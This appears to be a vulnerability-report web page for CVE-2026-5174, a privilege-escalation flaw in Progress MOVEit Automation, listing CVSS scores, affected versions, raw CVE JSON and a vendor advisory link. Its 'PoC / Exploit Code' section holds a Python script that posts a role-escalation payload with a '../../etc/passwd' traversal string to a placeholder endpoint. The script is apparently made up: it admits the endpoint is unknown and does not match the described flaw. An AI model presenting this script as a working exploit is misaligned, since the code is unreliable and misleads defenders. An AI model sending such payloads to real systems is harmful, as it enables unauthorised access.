Security Vulnerability Report
中文
CVE-2026-5174 CVSS 7.7 HIGH

CVE-2026-5174

Published: 2026-04-30 16:16:44
Last Modified: 2026-05-04 16:47:31

Description

Improper input validation vulnerability in Progress Software MOVEit Automation allows Privilege Escalation. This issue affects MOVEit Automation: from 2025.1.0 before 2025.1.5, from 2025.0.0 before 2025.0.9, from 2024.0.0 before 2024.1.8, versions prior to 2024.0.0.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:progress:moveit_automation:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:progress:moveit_automation:*:*:*:*:*:*:*:* - VULNERABLE
MOVEit Automation 2025.1.0 至 2025.1.5 之前
MOVEit Automation 2025.0.0 至 2025.0.9 之前
MOVEit Automation 2024.0.0 至 2024.1.8 之前
MOVEit Automation 2024.0.0 之前的所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-5174: Privilege Escalation via Improper Input Validation # Disclaimer: This code is for educational and research purposes only. def exploit(target_url, session_cookie): headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Cookie": f"session={session_cookie}", "Content-Type": "application/json" } # Malicious payload attempting to inject privileged commands or parameters # The specific endpoint depends on the vulnerable component (e.g., /api/v1/user/role) payload = { "username": "low_priv_user", "role": "admin", # Attempting to escalate privilege "validation_bypass": "../../etc/passwd" # Example of input validation bypass technique } try: response = requests.post(f"{target_url}/api/vulnerable_endpoint", json=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200 and "admin" in response.text: print("[+] Exploit successful! Privilege escalation detected.") print(f"[+] Response: {response.text}") else: print("[-] Exploit failed or target patched.") print(f"[-] Status Code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Replace with actual target details for testing target = "https://moveit-target.example.com" cookie = "valid_low_priv_session_token" exploit(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5174", "sourceIdentifier": "[email protected]", "published": "2026-04-30T16:16:44.330", "lastModified": "2026-05-04T16:47:30.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input validation vulnerability in Progress Software MOVEit Automation allows Privilege Escalation.\n\nThis issue affects MOVEit Automation: from 2025.1.0 before 2025.1.5, from 2025.0.0 before 2025.0.9, from 2024.0.0 before 2024.1.8, versions prior to 2024.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_automation:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024.1.8", "matchCriteriaId": "0413566A-895A-49F1-8055-3C5F695CBDF3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_automation:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.0.0", "versionEndExcluding": "2025.1.5", "matchCriteriaId": "C8AEB9B6-4337-422F-85FB-B8146FC3F2CF"}]}]}], "references": [{"url": "https://community.progress.com/s/article/MOVEit-Automation-Critical-Security-Alert-Bulletin-April-2026-CVE-2026-4670-CVE-2026-5174", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}